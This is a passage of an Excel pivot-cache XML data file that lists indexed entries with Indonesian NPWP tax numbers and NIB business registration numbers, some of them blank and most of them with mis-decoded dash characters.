  <r>
    <x v="1172"/>
    <s v="npwp"/>
    <s v="84‚Äì333‚Äì009‚Äì3‚Äì201‚Äì000"/>
  </r>
  <r>
    <x v="1173"/>
    <s v="npwp"/>
    <s v="31‚Äì547‚Äì678‚Äì8‚Äì402‚Äì000"/>
  </r>
  <r>
    <x v="1173"/>
    <s v="nib"/>
    <n v="8120210111723"/>
  </r>
  <r>
    <x v="1174"/>
    <s v="npwp"/>
    <s v="80‚Äì457‚Äì569‚Äì4‚Äì124‚Äì000"/>
  </r>
  <r>
    <x v="1175"/>
    <s v="npwp"/>
    <s v="06‚Äì851‚Äì900‚Äì8‚Äì951‚Äì000"/>
  </r>
  <r>
    <x v="1175"/>
    <s v="nib"/>
    <n v="8120017200918"/>
  </r>
  <r>
    <x v="1176"/>
    <s v="npwp"/>
    <s v="01‚Äì438‚Äì617‚Äì1‚Äì641‚Äì000"/>
  </r>
  <r>
    <x v="1176"/>
    <s v="nib"/>
    <n v="8120001702648"/>
  </r>
  <r>
    <x v="1177"/>
    <s v="npwp"/>
    <s v="85‚Äì597‚Äì555‚Äì3‚Äì402‚Äì000"/>
  </r>
  <r>
    <x v="1177"/>
    <s v="nib"/>
    <n v="8120105833403"/>
  </r>
  <r>
    <x v="1178"/>
    <s v="npwp"/>
    <s v="81‚Äì991‚Äì686‚Äì7‚Äì409‚Äì000"/>
  </r>
  <r>
    <x v="1178"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="1179"/>
    <s v="npwp"/>
    <s v="81‚Äì859‚Äì949‚Äì0‚Äì047‚Äì000"/>
  </r>
  <r>
    <x v="1179"/>
    <s v="nib"/>
    <n v="9120201140329"/>
  </r>
  <r>
    <x v="1180"/>
    <s v="npwp"/>
    <s v="21‚Äì010‚Äì768‚Äì6‚Äì126‚Äì000"/>
  </r>
  <r>
    <x v="1180"/>
    <s v="nib"/>
    <n v="8120015110227"/>
  </r>
  <r>
    <x v="1181"/>
    <s v="npwp"/>
    <s v="03‚Äì047‚Äì598‚Äì2‚Äì805‚Äì001"/>
  </r>
  <r>
    <x v="1181"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="1182"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="1182"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="1183"/>
    <s v="npwp"/>
    <s v="01‚Äì891‚Äì866‚Äì4‚Äì041‚Äì000"/>
  </r>
  <r>
    <x v="1183"/>
    <s v="nib"/>
    <n v="8120006890397"/>
  </r>
  <r>
    <x v="1184"/>
    <s v="npwp"/>
    <s v="14.889.932.1-223.000"/>
  </r>
  <r>
    <x v="1184"/>
    <s v="nib"/>
    <n v="8120212211307"/>
  </r>
  <r>
    <x v="1185"/>
    <s v="npwp"/>
    <s v="76‚Äì679‚Äì420‚Äì0‚Äì223‚Äì000"/>
  </r>
  <r>
    <x v="1185"/>
    <s v="nib"/>
    <n v="8120312242305"/>
  </r>
  <r>
    <x v="1186"/>
    <s v="npwp"/>
    <s v="75.885.204.0-212.000"/>
  </r>
  <r>
    <x v="1186"/>
    <s v="nib"/>
    <n v="8120215030627"/>
  </r>
  <r>
    <x v="1187"/>
    <s v="npwp"/>
    <s v="86‚Äì237‚Äì592‚Äì0‚Äì214‚Äì000"/>
  </r>
  <r>
    <x v="1187"/>
    <s v="nib"/>
    <n v="8120218071176"/>
  </r>
  <r>
    <x v="1188"/>
    <s v="npwp"/>
    <s v="01‚Äì061‚Äì076‚Äì4‚Äì093‚Äì000"/>
  </r>
  <r>
    <x v="1188"/>
    <s v="nib"/>
    <n v="8120110232884"/>
  </r>
  <r>
    <x v="1189"/>
    <s v="npwp"/>
    <s v="02‚Äì754‚Äì336‚Äì2‚Äì901‚Äì000"/>
  </r>
  <r>
    <x v="1189"/>
    <s v="nib"/>
    <n v="8120017270466"/>
  </r>
  <r>
    <x v="1190"/>
    <s v="npwp"/>
    <s v="80‚Äì238‚Äì755‚Äì5‚Äì721‚Äì000"/>
  </r>
  <r>
    <x v="1190"/>
    <s v="nib"/>
    <n v="8120119261776"/>
  </r>
  <r>
    <x v="1191"/>
    <s v="npwp"/>
    <s v="84‚Äì040‚Äì418‚Äì0‚Äì622‚Äì000"/>
  </r>
  <r>
    <x v="1191"/>
    <s v="nib"/>
    <n v="8120204931393"/>
  </r>
  <r>
    <x v="1192"/>
    <s v="npwp"/>
    <s v="01‚Äì704‚Äì079‚Äì1‚Äì503‚Äì000"/>
  </r>
  <r>
    <x v="1192"/>
    <s v="nib"/>
    <n v="8120112200778"/>
  </r>
  <r>
    <x v="1193"/>
    <s v="npwp"/>
    <s v="02‚Äì275‚Äì077‚Äì2‚Äì059‚Äì000"/>
  </r>
  <r>
    <x v="1193"/>
    <s v="nib"/>
    <n v="8120003840894"/>
  </r>
  <r>
    <x v="1194"/>
    <s v="npwp"/>
    <s v="01‚Äì312‚Äì174‚Äì4‚Äì062‚Äì000"/>
  </r>
  <r>
    <x v="1194"/>
    <s v="nib"/>
    <n v="8120007922978"/>
  </r>
  <r>
    <x v="1195"/>
    <s v="npwp"/>
    <s v="02‚Äì032‚Äì738‚Äì3‚Äì812‚Äì000"/>
  </r>
  <r>
    <x v="1196"/>
    <s v="npwp"/>
    <s v="85‚Äì689‚Äì102‚Äì3‚Äì402‚Äì000"/>
  </r>
  <r>
    <x v="1197"/>
    <s v="npwp"/>
    <s v="75‚Äì710‚Äì521‚Äì8‚Äì801‚Äì000"/>
  </r>
  <r>
    <x v="1197"/>
    <s v="nib"/>
    <n v="8120002872898"/>
  </r>
  <r>
    <x v="1198"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="1198"/>
    <s v="nib"/>
    <n v="9120300291252"/>
  </r>
  <r>
    <x v="1199"/>
    <s v="npwp"/>
    <s v="01‚Äì620‚Äì906‚Äì6‚Äì054‚Äì000"/>
  </r>
  <r>
    <x v="1199"/>
    <s v="nib"/>
    <n v="8120219170122"/>
  </r>
  <r>
    <x v="1200"/>
    <s v="npwp"/>
    <s v="84‚Äì844‚Äì897‚Äì3‚Äì048‚Äì000"/>
  </r>
  <r>
    <x v="1200"/>
    <s v="nib"/>
    <n v="8120109880334"/>
  </r>
  <r>
    <x v="1201"/>
    <s v="npwp"/>
    <s v="07‚Äì703‚Äì829‚Äì7‚Äì804‚Äì000"/>
  </r>
  <r>
    <x v="1201"/>
    <s v="nib"/>
    <n v="8120015271228"/>
  </r>
  <r>
    <x v="1202"/>
    <s v="npwp"/>
    <s v="01‚Äì951‚Äì411‚Äì6‚Äì057‚Äì000"/>
  </r>
  <r>
    <x v="1202"/>
    <s v="nib"/>
    <n v="8120000891333"/>
  </r>
  <r>
    <x v="1203"/>
    <s v="npwp"/>
    <s v="01‚Äì526‚Äì655‚Äì4‚Äì614‚Äì000"/>
  </r>
  <r>
    <x v="1203"/>
    <s v="nib"/>
    <n v="8120003822374"/>
  </r>
  <r>
    <x v="1204"/>
    <s v="npwp"/>
    <s v="03‚Äì299‚Äì921‚Äì1‚Äì801‚Äì000"/>
  </r>
  <r>
    <x v="1204"/>
    <s v="nib"/>
    <n v="9120304110683"/>
  </r>
  <r>
    <x v="1205"/>
    <s v="npwp"/>
    <s v="81‚Äì107‚Äì406‚Äì1‚Äì627‚Äì000"/>
  </r>
  <r>
    <x v="1205"/>
    <s v="nib"/>
    <n v="8120014032593"/>
  </r>
  <r>
    <x v="1206"/>
    <s v="npwp"/>
    <s v="02‚Äì817‚Äì442‚Äì3‚Äì613‚Äì000"/>
  </r>
  <r>
    <x v="1206"/>
    <s v="nib"/>
    <n v="8120101841565"/>
  </r>
  <r>
    <x v="1207"/>
    <s v="npwp"/>
    <s v="36‚Äì398‚Äì172‚Äì1‚Äì702‚Äì000"/>
  </r>
  <r>
    <x v="1207"/>
    <s v="nib"/>
    <n v="220003351347"/>
  </r>
  <r>
    <x v="1208"/>
    <s v="npwp"/>
    <s v="47‚Äì827‚Äì652‚Äì0‚Äì621‚Äì000"/>
  </r>
  <r>
    <x v="1209"/>
    <s v="npwp"/>
    <s v="02‚Äì881‚Äì392‚Äì1‚Äì036‚Äì000"/>
  </r>
  <r>
    <x v="1209"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="1210"/>
    <s v="npwp"/>
    <s v="14‚Äì454‚Äì239‚Äì6‚Äì224‚Äì000"/>
  </r>
  <r>
    <x v="1210"/>
    <s v="nib"/>
    <n v="8120203980159"/>
  </r>
  <r>
    <x v="1211"/>
    <s v="npwp"/>
    <s v="01‚Äì368‚Äì275‚Äì2‚Äì092‚Äì000"/>
  </r>
  <r>
    <x v="1211"/>
    <s v="nib"/>
    <n v="8120107910232"/>
  </r>
  <r>
    <x v="1212"/>
    <s v="npwp"/>
    <s v="85‚Äì712‚Äì942‚Äì3‚Äì311‚Äì000"/>
  </r>
  <r>
    <x v="1212"/>
    <s v="nib"/>
    <n v="8120100813203"/>
  </r>
  <r>
    <x v="1213"/>
    <s v="npwp"/>
    <s v="86‚Äì470‚Äì202‚Äì2‚Äì807‚Äì000"/>
  </r>
  <r>
    <x v="1213"/>
    <s v="nib"/>
    <n v="8120011181279"/>
  </r>
  <r>
    <x v="1214"/>
    <s v="npwp"/>
    <s v="01‚Äì871‚Äì438‚Äì6‚Äì033‚Äì000"/>
  </r>
  <r>
    <x v="1214"/>
    <s v="nib"/>
    <n v="8120000891118"/>
  </r>
  <r>
    <x v="1215"/>
    <s v="npwp"/>
    <s v="01‚Äì140‚Äì938‚Äì0‚Äì641‚Äì001"/>
  </r>
  <r>
    <x v="1215"/>
    <s v="nib"/>
    <n v="8120311100056"/>
  </r>
  <r>
    <x v="1216"/>
    <s v="npwp"/>
    <s v="85‚Äì765‚Äì423‚Äì0‚Äì801‚Äì000"/>
  </r>
  <r>
    <x v="1217"/>
    <s v="npwp"/>
    <s v="82‚Äì423‚Äì525‚Äì3‚Äì723‚Äì000"/>
  </r>
  <r>
    <x v="1217"/>
    <s v="nib"/>
    <n v="8120010270841"/>
  </r>
  <r>
    <x v="1218"/>
    <s v="npwp"/>
    <s v="31‚Äì671‚Äì806‚Äì3‚Äì723‚Äì000"/>
  </r>
  <r>
    <x v="1218"/>
    <s v="nib"/>
    <n v="8120211160919"/>
  </r>
  <r>
    <x v="1219"/>
    <s v="npwp"/>
    <s v="31‚Äì671‚Äì806‚Äì3‚Äì723‚Äì000"/>
  </r>
  <r>
    <x v="1219"/>
    <s v="nib"/>
    <n v="8120211160919"/>
  </r>
  <r>
    <x v="1220"/>
    <s v="npwp"/>
    <s v="01‚Äì715‚Äì234‚Äì9‚Äì801‚Äì000"/>
  </r>
  <r>
    <x v="1220"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="1221"/>
    <s v="npwp"/>
    <s v="04‚Äì212‚Äì171‚Äì5‚Äì617‚Äì000"/>
  </r>
  <r>
    <x v="1221"/>
    <s v="nib"/>
    <n v="8120212231208"/>
  </r>
  <r>
    <x v="1222"/>
    <s v="npwp"/>
    <s v="73‚Äì589‚Äì267‚Äì1‚Äì071‚Äì000"/>
  </r>
  <r>
    <x v="1222"/>
    <s v="nib"/>
    <n v="8120003712405"/>
  </r>
  <r>
    <x v="1223"/>
    <s v="npwp"/>
    <s v="73‚Äì357‚Äì927‚Äì0‚Äì224‚Äì000"/>
  </r>
  <r>
    <x v="1223"/>
    <s v="nib"/>
    <n v="8120014021253"/>
  </r>
  <r>
    <x v="1224"/>
    <s v="npwp"/>
    <s v="14‚Äì029‚Äì153‚Äì5‚Äì224‚Äì000"/>
  </r>
  <r>
    <x v="1224"/>
    <s v="nib"/>
    <n v="8120212231493"/>
  </r>
  <r>
    <x v="1225"/>
    <s v="npwp"/>
    <s v="02‚Äì043‚Äì969‚Äì1‚Äì505‚Äì000"/>
  </r>
  <r>
    <x v="1225"/>
    <s v="nib"/>
    <n v="8120111260076"/>
  </r>
  <r>
    <x v="1226"/>
    <s v="npwp"/>
    <s v="14‚Äì454‚Äì273‚Äì5‚Äì224‚Äì000"/>
  </r>
  <r>
    <x v="1226"/>
    <s v="nib"/>
    <n v="8120312271421"/>
  </r>
  <r>
    <x v="1227"/>
    <s v="npwp"/>
    <s v="84‚Äì493‚Äì555‚Äì1‚Äì507‚Äì000"/>
  </r>
  <r>
    <x v="1227"/>
    <s v="nib"/>
    <n v="8120118000784"/>
  </r>
  <r>
    <x v="1228"/>
    <s v="npwp"/>
    <s v="70‚Äì466‚Äì044‚Äì8‚Äì036‚Äì000"/>
  </r>
  <r>
    <x v="1229"/>
    <s v="npwp"/>
    <s v="01‚Äì425‚Äì024‚Äì5‚Äì604‚Äì000"/>
  </r>
  <r>
    <x v="1230"/>
    <s v="npwp"/>
    <n v="865439509804000"/>
  </r>
  <r>
    <x v="1230"/>
    <s v="nib"/>
    <n v="8120116132733"/>
  </r>
  <r>
    <x v="1231"/>
    <s v="npwp"/>
    <s v="02‚Äì155‚Äì253‚Äì4‚Äì411‚Äì000"/>
  </r>
  <r>
    <x v="1231"/>
    <s v="nib"/>
    <n v="9120105251251"/>
  </r>
  <r>
    <x v="1232"/>
    <s v="npwp"/>
    <s v="01‚Äì000‚Äì065‚Äì1‚Äì613‚Äì001"/>
  </r>
  <r>
    <x v="1232"/>
    <s v="nib"/>
    <n v="8120003713913"/>
  </r>
  <r>
    <x v="1233"/>
    <s v="npwp"/>
    <s v="31‚Äì297‚Äì674‚Äì9‚Äì517‚Äì000"/>
  </r>
  <r>
    <x v="1233"/>
    <s v="nib"/>
    <n v="9120105261432"/>
  </r>
  <r>
    <x v="1234"/>
    <s v="npwp"/>
    <s v="70‚Äì223‚Äì081‚Äì4‚Äì913‚Äì000"/>
  </r>
  <r>
    <x v="1235"/>
    <s v="npwp"/>
    <s v="72‚Äì350‚Äì278‚Äì7‚Äì212‚Äì000"/>
  </r>
  <r>
    <x v="1235"/>
    <s v="nib"/>
    <n v="9120313070936"/>
  </r>
  <r>
    <x v="1236"/>
    <s v="npwp"/>
    <s v="15‚Äì037‚Äì223‚Äì3‚Äì215‚Äì000"/>
  </r>
  <r>
    <x v="1236"/>
    <s v="nib"/>
    <n v="8120113262679"/>
  </r>
  <r>
    <x v="1237"/>
    <s v="npwp"/>
    <s v="85‚Äì961‚Äì947‚Äì0‚Äì101‚Äì000"/>
  </r>
  <r>
    <x v="1237"/>
    <s v="nib"/>
    <n v="8120100992362"/>
  </r>
  <r>
    <x v="1238"/>
    <s v="npwp"/>
    <s v="82‚Äì444‚Äì430‚Äì1‚Äì212‚Äì000"/>
  </r>
  <r>
    <x v="1238"/>
    <s v="nib"/>
    <n v="8120014151382"/>
  </r>
  <r>
    <x v="1239"/>
    <s v="npwp"/>
    <s v="80‚Äì798‚Äì678‚Äì1‚Äì042‚Äì000"/>
  </r>
  <r>
    <x v="1239"/>
    <s v="nib"/>
    <n v="8120109830439"/>
  </r>
  <r>
    <x v="1240"/>
    <s v="nib"/>
    <n v="9120200750341"/>
  </r>
  <r>
    <x v="1241"/>
    <s v="npwp"/>
    <s v="02‚Äì125‚Äì121‚Äì0‚Äì415‚Äì000"/>
  </r>
  <r>
    <x v="1241"/>
    <s v="nib"/>
    <n v="8120217150963"/>
  </r>
  <r>
    <x v="1242"/>
    <s v="npwp"/>
    <s v="82‚Äì308‚Äì062‚Äì7‚Äì451‚Äì000"/>
  </r>
  <r>
    <x v="1242"/>
    <s v="nib"/>
    <n v="8120109881458"/>
  </r>
  <r>
    <x v="1243"/>
    <s v="npwp"/>
    <s v="14‚Äì782‚Äì078‚Äì1‚Äì821‚Äì000"/>
  </r>
  <r>
    <x v="1243"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="1244"/>
    <s v="npwp"/>
    <s v="21‚Äì014‚Äì753‚Äì4‚Äì013‚Äì000"/>
  </r>
  <r>
    <x v="1244"/>
    <s v="nib"/>
    <n v="8120019040792"/>
  </r>
  <r>
    <x v="1245"/>
    <s v="npwp"/>
    <s v="84‚Äì039‚Äì461‚Äì3‚Äì047‚Äì000"/>
  </r>
  <r>
    <x v="1245"/>
    <s v="nib"/>
    <n v="8120206962906"/>
  </r>
  <r>
    <x v="1246"/>
    <s v="npwp"/>
    <s v="01‚Äì452‚Äì823‚Äì6‚Äì124‚Äì000"/>
  </r>
  <r>
    <x v="1246"/>
    <s v="nib"/>
    <n v="8120017242206"/>
  </r>
  <r>
    <x v="1247"/>
    <s v="npwp"/>
    <s v="01‚Äì501‚Äì399‚Äì8‚Äì122‚Äì000"/>
  </r>
  <r>
    <x v="1247"/>
    <s v="nib"/>
    <n v="9120301260912"/>
  </r>
  <r>
    <x v="1248"/>
    <s v="npwp"/>
    <s v="04‚Äì020‚Äì896‚Äì9‚Äì617‚Äì000"/>
  </r>
  <r>
    <x v="1248"/>
    <s v="nib"/>
    <n v="8120019062355"/>
  </r>
  <r>
    <x v="1249"/>
    <s v="npwp"/>
    <s v="77‚Äì496‚Äì885‚Äì3‚Äì648‚Äì000"/>
  </r>
  <r>
    <x v="1249"/>
    <s v="nib"/>
    <n v="9120109230579"/>
  </r>
  <r>
    <x v="1250"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="1250"/>
    <s v="nib"/>
    <n v="8120115232709"/>
  </r>
  <r>
    <x v="1251"/>
    <s v="npwp"/>
    <s v="01‚Äì871‚Äì297‚Äì6‚Äì426‚Äì001"/>
  </r>
  <r>
    <x v="1251"/>
    <s v="nib"/>
    <n v="8120103911771"/>
  </r>
  <r>
    <x v="1252"/>
    <s v="npwp"/>
    <s v="01‚Äì770‚Äì659‚Äì9‚Äì048‚Äì000"/>
  </r>
  <r>
    <x v="1252"/>
    <s v="nib"/>
    <n v="8120202980946"/>
  </r>
  <r>
    <x v="1253"/>
    <s v="npwp"/>
    <s v="02‚Äì469‚Äì876‚Äì3‚Äì805‚Äì000"/>
  </r>
  <r>
    <x v="1253"/>
    <s v="nib"/>
    <n v="8120115282786"/>
  </r>
  <r>
    <x v="1254"/>
    <s v="npwp"/>
    <s v="01‚Äì484‚Äì575‚Äì4‚Äì812‚Äì000"/>
  </r>
  <r>
    <x v="1254"/>
    <s v="nib"/>
    <n v="8120014200983"/>
  </r>
  <r>
    <x v="1255"/>
    <s v="npwp"/>
    <s v="02‚Äì164‚Äì480‚Äì2‚Äì812‚Äì000"/>
  </r>
  <r>
    <x v="1255"/>
    <s v="nib"/>
    <n v="9120409990928"/>
  </r>
  <r>
    <x v="1256"/>
    <s v="npwp"/>
    <s v="01‚Äì235‚Äì216‚Äì7‚Äì601‚Äì000"/>
  </r>
  <r>
    <x v="1256"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="1257"/>
    <s v="npwp"/>
    <s v="07‚Äì865‚Äì248‚Äì4‚Äì604‚Äì001"/>
  </r>
  <r>
    <x v="1257"/>
    <s v="nib"/>
    <n v="8120003990261"/>
  </r>
  <r>
    <x v="1258"/>
    <s v="npwp"/>
    <s v="01‚Äì235‚Äì216‚Äì7‚Äì627‚Äì001"/>
  </r>
  <r>
    <x v="1258"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="1259"/>
    <s v="npwp"/>
    <s v="86‚Äì827‚Äì785‚Äì6‚Äì823‚Äì000"/>
  </r>
  <r>
    <x v="1259"/>
    <s v="nib"/>
    <n v="8120018251826"/>
  </r>
  <r>
    <x v="1260"/>
    <s v="npwp"/>
    <s v="02‚Äì823‚Äì769‚Äì1‚Äì507‚Äì001"/>
  </r>
  <r>
    <x v="1260"/>
    <s v="nib"/>
    <n v="8120001880038"/>
  </r>
  <r>
    <x v="1261"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="1262"/>
    <s v="npwp"/>
    <s v="01‚Äì002‚Äì145‚Äì9‚Äì014‚Äì000"/>
  </r>
  <r>
    <x v="1262"/>
    <s v="nib"/>
    <n v="8120112012544"/>
  </r>
  <r>
    <x v="1263"/>
    <s v="npwp"/>
    <s v="01‚Äì000‚Äì532‚Äì0‚Äì014‚Äì000"/>
  </r>
  <r>
    <x v="1263"/>
    <s v="nib"/>
    <n v="8120018002842"/>
  </r>
  <r>
    <x v="1264"/>
    <s v="npwp"/>
    <s v="81‚Äì452‚Äì741‚Äì2‚Äì034‚Äì000"/>
  </r>
  <r>
    <x v="1264"/>
    <s v="nib"/>
    <n v="8120200921439"/>
  </r>
  <r>
    <x v="1265"/>
    <s v="npwp"/>
    <s v="14‚Äì454‚Äì239‚Äì6‚Äì224‚Äì000"/>
  </r>
  <r>
    <x v="1265"/>
    <s v="nib"/>
    <n v="8120203980159"/>
  </r>
  <r>
    <x v="1266"/>
    <s v="npwp"/>
    <s v="02‚Äì115‚Äì861‚Äì3‚Äì513‚Äì000"/>
  </r>
  <r>
    <x v="1266"/>
    <s v="nib"/>
    <n v="9120103190622"/>
  </r>
  <r>
    <x v="1267"/>
    <s v="npwp"/>
    <s v="71‚Äì558‚Äì666‚Äì5‚Äì426‚Äì000"/>
  </r>
  <r>
    <x v="1267"/>
    <s v="nib"/>
    <n v="8120004920936"/>
  </r>
  <r>
    <x v="1268"/>
    <s v="npwp"/>
    <s v="02‚Äì101‚Äì053‚Äì5‚Äì812‚Äì000"/>
  </r>
  <r>
    <x v="1268"/>
    <s v="nib"/>
    <n v="8120111131253"/>
  </r>
  <r>
    <x v="1269"/>
    <s v="npwp"/>
    <s v="06‚Äì263‚Äì317‚Äì7‚Äì617‚Äì000"/>
  </r>
  <r>
    <x v="1269"/>
    <s v="nib"/>
    <n v="8120015152518"/>
  </r>
  <r>
    <x v="1270"/>
    <s v="npwp"/>
    <s v="01.829.759.8-627.000"/>
  </r>
  <r>
    <x v="1270"/>
    <s v="nib"/>
    <n v="9120305810976"/>
  </r>
  <r>
    <x v="1271"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="1271"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="1272"/>
    <s v="npwp"/>
    <s v="91‚Äì307‚Äì807‚Äì7‚Äì915‚Äì000"/>
  </r>
  <r>
    <x v="1273"/>
    <s v="npwp"/>
    <s v="83‚Äì235‚Äì227‚Äì2‚Äì604‚Äì000"/>
  </r>
  <r>
    <x v="1273"/>
    <s v="nib"/>
    <n v="8120002772785"/>
  </r>
  <r>
    <x v="1274"/>
    <s v="npwp"/>
    <s v="80‚Äì513‚Äì991‚Äì2‚Äì224‚Äì000"/>
  </r>
  <r>
    <x v="1274"/>
    <s v="nib"/>
    <n v="9120109112859"/>
  </r>
  <r>
    <x v="1275"/>
    <s v="npwp"/>
    <s v="02‚Äì076‚Äì801‚Äì6‚Äì046‚Äì000"/>
  </r>
  <r>
    <x v="1275"/>
    <s v="nib"/>
    <n v="8120101823407"/>
  </r>
  <r>
    <x v="1276"/>
    <s v="npwp"/>
    <s v="02‚Äì817‚Äì442‚Äì3‚Äì613‚Äì000"/>
  </r>
  <r>
    <x v="1276"/>
    <s v="nib"/>
    <n v="8120101841565"/>
  </r>
  <r>
    <x v="1277"/>
    <s v="npwp"/>
    <s v="01‚Äì880‚Äì300‚Äì7‚Äì112‚Äì000"/>
  </r>
  <r>
    <x v="1277"/>
    <s v="nib"/>
    <n v="8120200802437"/>
  </r>
  <r>
    <x v="1278"/>
    <s v="npwp"/>
    <s v="03‚Äì060‚Äì590‚Äì1‚Äì112‚Äì000"/>
  </r>
  <r>
    <x v="1278"/>
    <s v="nib"/>
    <n v="8120101802538"/>
  </r>
  <r>
    <x v="1279"/>
    <s v="npwp"/>
    <s v="66‚Äì989‚Äì776‚Äì1‚Äì656‚Äì000"/>
  </r>
  <r>
    <x v="1279"/>
    <s v="nib"/>
    <n v="9120100882563"/>
  </r>
  <r>
    <x v="1280"/>
    <s v="npwp"/>
    <s v="01‚Äì941‚Äì600‚Äì7‚Äì614‚Äì000"/>
  </r>
  <r>
    <x v="1280"/>
    <s v="nib"/>
    <n v="9120209151753"/>
  </r>
  <r>
    <x v="1281"/>
    <s v="npwp"/>
    <s v="81‚Äì227‚Äì041‚Äì1‚Äì017‚Äì000"/>
  </r>
  <r>
    <x v="1281"/>
    <s v="nib"/>
    <n v="8120013162091"/>
  </r>
  <r>
    <x v="1282"/>
    <s v="npwp"/>
    <s v="02.296.549.5-041.000"/>
  </r>
  <r>
    <x v="1282"/>
    <s v="nib"/>
    <n v="8120004870536"/>
  </r>
  <r>
    <x v="1283"/>
    <s v="npwp"/>
    <s v="03‚Äì025‚Äì137‚Äì5‚Äì643‚Äì000"/>
  </r>
  <r>
    <x v="1283"/>
    <s v="nib"/>
    <n v="1248000201035"/>
  </r>
  <r>
    <x v="1284"/>
    <s v="npwp"/>
    <n v="22164701805000"/>
  </r>
  <r>
    <x v="1284"/>
    <s v="nib"/>
    <n v="9120006132686"/>
  </r>
  <r>
    <x v="1285"/>
    <s v="npwp"/>
    <s v="02‚Äì948‚Äì500‚Äì0‚Äì507‚Äì000"/>
  </r>
  <r>
    <x v="1285"/>
    <s v="nib"/>
    <n v="8120108911541"/>
  </r>
  <r>
    <x v="1286"/>
    <s v="nib"/>
    <n v="9120007190831"/>
  </r>
  <r>
    <x v="1287"/>
    <s v="npwp"/>
    <s v="86‚Äì125‚Äì979‚Äì4‚Äì047‚Äì000"/>
  </r>
  <r>
    <x v="1287"/>
    <s v="nib"/>
    <n v="8120118031406"/>
  </r>
  <r>
    <x v="1288"/>
    <s v="npwp"/>
    <s v="72‚Äì772‚Äì986‚Äì5‚Äì806‚Äì000"/>
  </r>
  <r>
    <x v="1288"/>
    <s v="nib"/>
    <n v="9120208161854"/>
  </r>
  <r>
    <x v="1289"/>
    <s v="npwp"/>
    <s v="16‚Äì827‚Äì101‚Äì3‚Äì822‚Äì000"/>
  </r>
  <r>
    <x v="1289"/>
    <s v="nib"/>
    <n v="8120017150226"/>
  </r>
  <r>
    <x v="1290"/>
    <s v="npwp"/>
    <s v="73‚Äì072‚Äì621‚Äì3‚Äì627‚Äì000"/>
  </r>
  <r>
    <x v="1290"/>
    <s v="nib"/>
    <n v="8120107860835"/>
  </r>
  <r>
    <x v="1291"/>
    <s v="npwp"/>
    <s v="71‚Äì151‚Äì250‚Äì9‚Äì402‚Äì000"/>
  </r>
  <r>
    <x v="1291"/>
    <s v="nib"/>
    <n v="8120119103701"/>
  </r>
  <r>
    <x v="1292"/>
    <s v="npwp"/>
    <s v="02‚Äì800‚Äì347‚Äì3‚Äì641‚Äì000"/>
  </r>
  <r>
    <x v="1292"/>
    <s v="nib"/>
    <n v="8120211222064"/>
  </r>
  <r>
    <x v="1293"/>
    <s v="npwp"/>
    <s v="02‚Äì682‚Äì022‚Äì5‚Äì047‚Äì000"/>
  </r>
  <r>
    <x v="1293"/>
    <s v="nib"/>
    <n v="8120005861765"/>
  </r>
  <r>
    <x v="1294"/>
    <s v="npwp"/>
    <s v="85‚Äì377‚Äì157‚Äì4‚Äì017‚Äì000"/>
  </r>
  <r>
    <x v="1294"/>
    <s v="nib"/>
    <n v="8120013182251"/>
  </r>
  <r>
    <x v="1295"/>
    <s v="npwp"/>
    <s v="83‚Äì325‚Äì763‚Äì7‚Äì625‚Äì001"/>
  </r>
  <r>
    <x v="1295"/>
    <s v="nib"/>
    <n v="8120004842752"/>
  </r>
  <r>
    <x v="1296"/>
    <s v="npwp"/>
    <s v="86‚Äì761‚Äì064‚Äì4‚Äì047‚Äì000"/>
  </r>
  <r>
    <x v="1296"/>
    <s v="nib"/>
    <n v="9120003121433"/>
  </r>
  <r>
    <x v="1297"/>
    <s v="npwp"/>
    <s v="84‚Äì154‚Äì890‚Äì2‚Äì821‚Äì000"/>
  </r>
  <r>
    <x v="1298"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="1298"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="1299"/>
    <s v="npwp"/>
    <s v="02‚Äì714‚Äì291‚Äì8‚Äì612‚Äì000"/>
  </r>
  <r>
    <x v="1299"/>
    <s v="nib"/>
    <n v="8120315002245"/>
  </r>
  <r>
    <x v="1300"/>
    <s v="npwp"/>
    <s v="71.028.111.4-501.000"/>
  </r>
  <r>
    <x v="1300"/>
    <s v="nib"/>
    <n v="9120100760951"/>
  </r>
  <r>
    <x v="1301"/>
    <s v="npwp"/>
    <s v="70‚Äì117‚Äì302‚Äì3‚Äì301‚Äì000"/>
  </r>
  <r>
    <x v="1301"/>
    <s v="nib"/>
    <n v="9120207160896"/>
  </r>
  <r>
    <x v="1302"/>
    <s v="npwp"/>
    <s v="77‚Äì078‚Äì727‚Äì3‚Äì213‚Äì000"/>
  </r>
  <r>
    <x v="1302"/>
    <s v="nib"/>
    <n v="9120003180552"/>
  </r>
  <r>
    <x v="1303"/>
    <s v="npwp"/>
    <s v="75‚Äì979‚Äì061‚Äì1‚Äì213‚Äì000"/>
  </r>
  <r>
    <x v="1303"/>
    <s v="nib"/>
    <n v="8120208880797"/>
  </r>
  <r>
    <x v="1304"/>
    <s v="npwp"/>
    <s v="02‚Äì561‚Äì150‚Äì0‚Äì641‚Äì000"/>
  </r>
  <r>
    <x v="1304"/>
    <s v="nib"/>
    <n v="8120202742455"/>
  </r>
  <r>
    <x v="1305"/>
    <s v="npwp"/>
    <s v="03‚Äì129‚Äì279‚Äì0‚Äì801‚Äì000"/>
  </r>
  <r>
    <x v="1305"/>
    <s v="nib"/>
    <n v="9120105143014"/>
  </r>
  <r>
    <x v="1306"/>
    <s v="npwp"/>
    <s v="01‚Äì458‚Äì697‚Äì8‚Äì821‚Äì000"/>
  </r>
  <r>
    <x v="1306"/>
    <s v="nib"/>
    <n v="9120503152332"/>
  </r>
  <r>
    <x v="1307"/>
    <s v="npwp"/>
    <s v="83‚Äì467‚Äì637‚Äì1‚Äì503‚Äì000"/>
